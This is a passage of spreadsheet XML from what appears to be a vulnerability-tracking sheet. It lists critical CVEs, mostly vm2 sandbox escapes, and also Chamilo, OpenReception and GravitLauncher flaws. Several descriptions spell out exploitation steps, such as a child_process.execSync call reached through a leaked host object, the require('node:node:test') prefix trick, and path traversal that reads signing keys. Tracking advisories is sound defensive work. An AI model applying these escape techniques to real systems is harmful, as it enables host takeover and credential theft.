        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85889</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92937</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>vm2 3.11.6 is vulnerable to a sandbox escape leading to remote code execution in the host Node.js process. The fix for GHSA-m283-3h24-438v is incomplete: the bridge gate at lib/bridge.js:1624 identity-checks only the direct call target when deciding whether to rebuild/sanitise a rejected host Promise value. Registering the rejection handler through Function.prototype.call or .apply indirection (e.g., p.then.call(p, undefined, cb)) makes the intercepted target host Function.prototype.call, so the sanitiser never runs and the raw host error reaches sandbox code with its own properties intact. If an embedder exposes a host-realm Promise to the sandbox (an async host function bridged via the sandbox option, or a NodeVM external module's async method) and that Promise rejects with an Error carrying a non-primitive own property referencing a host object (for example err.detail = process), untrusted code in the sandbox obtains a fully functional proxy to that host object and can execute arbitrary commands with the privileges of the host process (e.g., e.detail.mainModule.require('child_process').execSync(...)). The direct p.then(undefined, cb), bind, and Reflect.apply forms are correctly sanitised. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92937</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92940</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.3 through 3.11.6 expose the host process's real https.globalAgent to sandboxed code when a NodeVM is explicitly configured to allow require('https'). The builtin loader wraps host modules in a read-only proxy, but method calls such as Agent.prototype.on() are forwarded to the underlying host object, so sandbox code can register a listener for the agent's 'free' event. When an unrelated host HTTPS request releases a pooled connection, the listener receives the live host request options and the host TLSSocket, allowing sandboxed code to read the host's Authorization header and private destination host/port, attach a data listener to the released socket and read subsequent host response bodies in plaintext, and issue attacker-chosen authenticated requests using the stolen credentials. The issue is fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92940</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92941</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.11.3 before 3.11.7 expose the host tls module to NodeVM sandbox code, allowing attackers to call tls.setDefaultCACertificates() and replace process-wide certificate authorities. Attackers with access to allowed tls and url builtins can use URLSearchParams to create host-realm arrays and manipulate the TLS trust store, enabling subsequent host HTTPS clients to accept attacker-controlled certificates.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92941</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92946</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a remote code execution vulnerability when require.external is enabled without an explicit require.root that excludes node_modules. Sandboxed code can require vm2's own package, instantiate an unrestricted NodeVM instance, and execute arbitrary host OS commands via child_process.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92946</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92947</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 exposes Node's shared Buffer pool to sandboxed code, allowing disclosure of host memory used by Buffer.from, Buffer.concat, and related allocations. Sandboxed code can read and write to host-realm buffers by acquiring ArrayBuffers from small allocations, leading to sensitive data exposure and potential denial-of-service.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92947</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92953</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.11.0 before 3.11.8 fail to protect host TypedArray and ArrayBuffer prototypes from sandbox mutation. Attackers can use prototype-walking primitives to reach and modify host Uint8Array.prototype, %TypedArray%.prototype, and ArrayBuffer.prototype, causing host-created typed arrays to observe attacker-controlled properties after VM.run() returns.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92953</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92955</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 contains a sandbox escape vulnerability in NodeVM that allows attackers to access the host __proto__ getter/setter through console._stdout and console._stderr. Attackers can overwrite EventEmitter.prototype.emit and trigger process events to execute code with process context, bypassing code generation restrictions.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92955</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92956</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.10.1 through 3.11.6 contain a sandbox escape reachable from a default `new VM()` sandbox when running on Node.js 26. WebAssembly.compileStreaming and WebAssembly.instantiateStreaming can produce a raw host-realm Promise that rejects with a host-realm error object; by controlling Symbol.species via Promise.prototype.finally, sandbox code receives that raw host error, walks from the host error constructor to the host Function constructor, and recovers the real host `process` object, gaining host Node.js capabilities (e.g. access to host modules such as fs) in the context of the process running the sandbox. No NodeVM, require permission, host object injection, or otherwise unsafe configuration is required. This is a bypass of the fix for GHSA-6j2x-vhqr-qr7q, which removed the JSPI entry points WebAssembly.promising and WebAssembly.Suspending. The issue is fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92956</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92960</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.6 fails to restrict access to os and dns builtins under the builtin: ['*'] configuration, allowing sandbox code to read host process identity and network topology. Attackers can invoke dns.setServers() to hijack the host process DNS resolver globally, redirecting all subsequent host DNS queries through an attacker-controlled resolver.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92960</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85885</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in M365 Copilot allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85885</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92938</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.3 through 3.11.6 expose Node.js's host node:sqlite module to code running in NodeVM when that builtin is permitted, either explicitly or through builtin: ['*']. The module is wrapped with vm.readonly(), which prevents property assignment but leaves host-authority callables reachable; in addition, the resolver treats any request starting with 'node:' as a core-module request and the runtime strips only one 'node:' prefix, so a sandbox request for 'node:node:sqlite' resolves to the configured node:sqlite entry. Sandboxed code can therefore create an in-memory DatabaseSync with extension loading enabled and call DatabaseSync.loadExtension() on a native library bundled in the untrusted plugin package (path derived from __dirname). SQLite loads the library into the Node.js host process and invokes its native entry point, giving the sandboxed plugin arbitrary native code execution outside the sandbox with the host process's privileges. The issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92938</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92948</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>vm2 versions &gt;= 3.9.6 and &lt;= 3.11.6 are affected by a NodeVM builtin allowlist bypass that permits a sandbox escape on Node.js 24 and newer when the embedder explicitly allows the node:test builtin (e.g. require: { builtin: ['node:test'] }). On Node.js 24+, module.builtinModules exposes the scheme-only key node:test, which is not covered by vm2's family-based DANGEROUS_BUILTINS protection, so it is stored in the generic host-passthrough loader. Because requireImpl() in lib/setup-node-sandbox.js strips a single 'node:' prefix before the builtin lookup, sandbox code calling require('node:node:test') resolves to the stored node:test key and receives a readonly proxy to the host module. Calls to node:test.run() are forwarded to the host implementation, which spawns a separate Node process for process-isolated test execution and passes through attacker-controlled execArgv values; supplying --eval=&lt;JavaScript&gt; therefore executes arbitrary JavaScript in an unrestricted host Node process outside the NodeVM sandbox. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92948</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45140</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>composer:chamilo/chamilo-lms</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>2.0.1</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-219, CWE-22, CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS is an open-source learning management system. Prior to 2.0.1, Chamilo LMS allows an unauthenticated remote attacker to execute arbitrary code on the server. The authoritative advisory does not identify the affected endpoint, component, input, or exploitation mechanism. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45140</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54460</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to 1.1.1, POST /api/auth/passkeys accepts a request-body userId and attacker-supplied passkey without an authenticated session, does not call WebAuthnService.verifyRegistration, and does not bind enrollment to locals.user.id. An unauthenticated attacker who knows the public tenant ID and the target staff email can use the public booking bootstrap and GET /api/tenants/[id]/appointments/staff-public-keys to obtain candidate userId values. The attacker first causes UserService.addAdditionalPasskey to store a controlled public key for a candidate userId, then attempts login with the target email; the login check compares verificationResult.userId with the email-resolved account and reveals whether the injected credential belongs to that target. Repeating this injection-before-login sequence identifies the matching userId, and the normal login endpoint accepts the attacker's assertion for the stored key and creates a STAFF session. The session can expose tenant data and reveal TENANT_ADMIN identifiers for further takeover; GLOBAL_ADMIN accounts are not reachable through this tenant-scoped path. A hijacked TENANT_ADMIN can modify or delete tenant resources and key shares, potentially making appointment data permanently undecryptable and taking booking services offline. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54460</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54617</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-522</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>GravitLauncher is an open-source Minecraft launcher based on sashok724's v3. Prior to 5.7.12, an unauthenticated remote actor can send a raw HTTP request target without a leading slash to the default LaunchServer file server on port 9274. FileServerHandler.channelRead0 in components/launchserver/src/main/java/pro/gravit/launchserver/socket/handlers/fileserver/FileServerHandler.java strips the first request-target character and resolves the remaining path against updatesDir without re-normalizing and verifying containment. This leaves parent-directory components in a no-leading-slash request and allows reading any file accessible to the LaunchServer process, including .keys/ecdsa_id, .keys/legacySalt, and LaunchServer.json. Disclosure of those files can expose signing keys, refresh-token material, and database credentials, enabling forged administrative access tokens and full authentication bypass. A normalizing L7 proxy may block the primary request form, but direct exposure and L4/TCP proxies remain affected, and netty.fileServerEnabled is enabled by default. This issue is fixed in 5.7.12.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54617</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
